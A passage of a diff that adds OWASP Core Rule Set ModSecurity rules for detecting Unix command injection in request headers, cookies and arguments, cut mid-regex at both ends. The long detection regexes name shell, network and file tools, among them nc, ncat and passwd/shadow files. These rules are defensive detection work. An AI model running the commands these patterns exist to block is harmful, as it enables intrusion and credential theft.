[arx]?|(?:(?:GE|POS)T|HEAD)[\s\v&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)[\s\v&\)<>\|]|pt(?:[\s\v&\)<>\|]|-get)|r(?:[\s\v&\)<>j\|]|(?:p|ch)[\s\v&\)<>\|]|ia2c)|s(?:h[\s\v&\)<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible-playbook|tobm)|b(?:z(?:z[\s\v&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[8-9]9|(?:a(?:t|ncel|psh)|c)[\s\v&\)<>\|]|mp|p(?:[\s\v&\)<>\|]|io|ulimit)|s(?:h|plit|vtool)|u(?:t[\s\v&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress))
)[\s\v&\)<>\|]|w(?:say|think))|r(?:ash[\s\v&\)<>\|]|on(?:tab)?))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\v&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\v&\)<>\|]|n(?:v(?:[\s\v&\)<>\|]|-update)|d(?:if|sw))|qn|s(?:[\s\v&\)<>h\|]|ac)|x(?:(?:ec)?[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\v&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\v&\)<>\|]|le(?:[\s\v&\)<>\|]|test))|mt|tp(?:[\s\v&\)<>\|]|stats|who)|acter|o(?:ld[\s\v&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\v]|ore)|db|e(?:(?:m|tfacl)[\s\v&\)<>\|]|ni(?:e[\s\v&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\v&\)<>\|]|nsh)|(?:o|awk)[\s\v&\)<>\|]|pg|r(?:c|ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|])|l(?:d(?:d?[\s\v&\)<>\|]|config)|(?:[np]|ynx)[\s\v&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\v&\)<>\|]|(?:la)?tex)|z(?:[\s\v&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\v&\)<>\|]|il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\v&\)<>\|]|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\v&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\v&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\v&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\
s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|ap)|p(?:m[\s\v&\)<>\|]|ing)|a(?:no[\s\v&\)<>\|]|sm|wk)|o(?:de[\s\v&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\v&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\v&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\v&\)<>\|]|p[^\s\v]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\v&\)<>\|]|int(?:env|f[\s\v&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:(?:f|ms)[\s\v&\)<>\|]|l(?:[\s\v&\)5<>\|]|sh))|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\v&\)<>\|]|shd)|y(?:thon[2-3]|3?versions))|r(?:a(?:r[\s\v&\)<>\|]|k(?:e[\s\v&\)<>\|]|u))|c(?:p[\s\v&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\v&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\v&\)<>\|]|user)|pm(?:[\s\v&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\v&\)<>\|]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v&\)<>\|])|e(?:(?:d|lf|rvice)[\s\v&\)<>\|]|t(?:(?:facl)?[\s\v&\)<>\|]|arch|env|sid)|ndmail)|(?:g|ash)[\s\v&\)<>\|]|h(?:(?:adow|ells)?[\s\v&\)<>\|]|\.distrib|u(?:f|tdown[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|h(?:[\s\v&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\v&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\v&\)<>\|]|il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|bl|c(?:p(?:[\s\v&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\v&\)<>\|]|lnet)|i(?:c[\s\v&\)<>\|]|me(?:datectl|out[\s\v&\)<>\|]))|o(?:p|uch[\s\v&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\v&\)<>\|]|diff)|ew[\s\v&\)<>\|]|gr|pw|rsh)|algrind|ol
atility[\s\v&\)<>\|])|w(?:c|a(?:ll|tch)[\s\v&\)<>\|]|h(?:iptail[\s\v&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\v&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\v&\)<>\|]|um)|z(?:ip(?:[\s\v&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|less|more|run|ypper))" \ + "id:932239,\ + phase:1,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection found in user-agent or referer header',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# [ Unix shell snippets ] +# +# Detect some common sequences found in shell commands and scripts. +# +# Some commands which were restricted in earlier rules due to FP, +# have been added here with their full path, in order to catch some +# cases where the full path is sent. 
+#
+# Rule relations:
+#
+# .932160 (base rule, PL1, unix shell commands with full path)
+# ..932161 (stricter sibling, PL2, unix shell commands with full path in User-Agent and Referer request headers)
+#
+SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@pmFromFile unix-shell.data" \
+ "id:932161,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:cmdLine,t:normalizePath,\
+ msg:'Remote Command Execution: Unix Shell Code Found in REQUEST_HEADERS',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'platform-unix',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+#
+# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
+#
+
+# [ Unix command injection ]
+#
+# This rule targets pefix + commans that are prone to false positive detection at PL3.
+#
+# Rule relations:
+#
+# .932230 (base rule, PL1, targets prefix + two and three character commands)
+# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command)
+# ..932232 (stricter sibling, PL3, targets prefix + additional command words)
+# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion)
+#
+# .932250 (base rule, PL1, targets two and three character commands)
+# .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+#
+# .932240 (generic detection, PL2, targets generic evasion attempts)
+# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
+# - with and without prefix
+# - words of any length)
+# ..932239 (sibling of 932236, PL2,
+# - with and without prefix
+# - words of any length
+# - targets request headers user-agent and referer only
+# - excluded words: known user-agents)
+# ..932238 (stricter sibling of 932236, PL3,
+# - no excluded words)
+# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+# - targets request headers user-agent and referer only
+# - without prefix
+# - with word boundaries
+# - words of any length
+# - excluded words: known user-agents)
+#
+#
+# Regular expression generated from regex-assembly/932232.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932232 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a
-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?2[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]
*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|s)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o|[\s\v&\),<>\|].*))\b" \ + "id:932232,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# [ Unix command injection ] +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, 
targets two and three character commands)
+# .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+#
+# .932240 (generic detection, PL2, targets generic evasion attempts)
+# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
+# - with and without prefix
+# - words of any length)
+# ..932239 (sibling of 932236, PL2,
+# - with and without prefix
+# - words of any length
+# - targets request headers user-agent and referer only
+# - excluded words: known user-agents)
+# ..932238 (stricter sibling of 932236, PL3,
+# - no excluded words)
+# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+# - targets request headers user-agent and referer only
+# - without prefix
+# - with word boundaries
+# - words of any length
+# - excluded words: known user-agents)
+#
+#
+# Regular expression generated from regex-assembly/932237.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 932237
+#
+SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx 
(?i)\b(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\v&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)[\s\v&\)<>\|]|pt(?:(?:itude)?[\s\v&\)<>\|]|-get)|r(?:[\s\v&\)<>j\|]|(?:p|ch)[\s\v&\)<>\|]|ia2c)|s(?:h?[\s\v&\)<>\|]|cii(?:-xfr|85)|pell)|t(?:[\s\v&\)<>\|]|obm)|dd(?:group|user)|getty|nsible-playbook)|b(?:z(?:z[\s\v&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[8-9]9|(?:a(?:t|ncel|psh)|c)[\s\v&\)<>\|]|mp|p(?:[\s\v&\)<>\|]|io|ulimit)|s(?:h|plit|vtool)|u(?:t[\s\v&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\v&\)<>\|]|w(?:say|think))|r(?:ash[\s\v&\)<>\|]|on(?:tab)?))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\v&\)<>\|]|n?f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\v&\)<>\|]|n(?:v(?:[\s\v&\)<>\|]|-update)|d(?:if|sw))|qn|s(?:[\s\v&\)<>h\|]|ac)|x(?:(?:ec)?[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\v&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\v&\)<>\|]|le(?:[\s\v&\)<>\|]|test))|mt|tp(?:[\s\v&\)<>\|]|stats|who)|acter|o(?:ld[\s\v&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\v]|ore)|db|e(?:(?:m|tfacl)[\s\v&\)<>\|]|ni(?:e[\s\v&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\v&\)<>\|]|nsh)|(?:o|awk)[\s\v&\)<>\|]|pg|r(?:c|ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\v&\)<>\|]|exec|o(?:(?:b
s|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|])|l(?:d(?:d?[\s\v&\)<>\|]|config)|(?:[np]|ynx)[\s\v&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\v&\)<>\|]|(?:la)?tex)|z(?:[\s\v&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\v&\)<>\|]|il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\v&\)<>\|]|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:(?:re|unt)[\s\v&\)<>\|]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\v&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\v&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|ap)|p(?:m[\s\v&\)<>\|]|ing)|a(?:no[\s\v&\)<>\|]|sm|wk)|o(?:de[\s\v&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|cman|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\v&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\v&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\v&\)<>\|]|p[^\s\v]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\v&\)<>\|]|int(?:env|f[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|ed|ftp|ql)?|t(?:x|ar(?:dif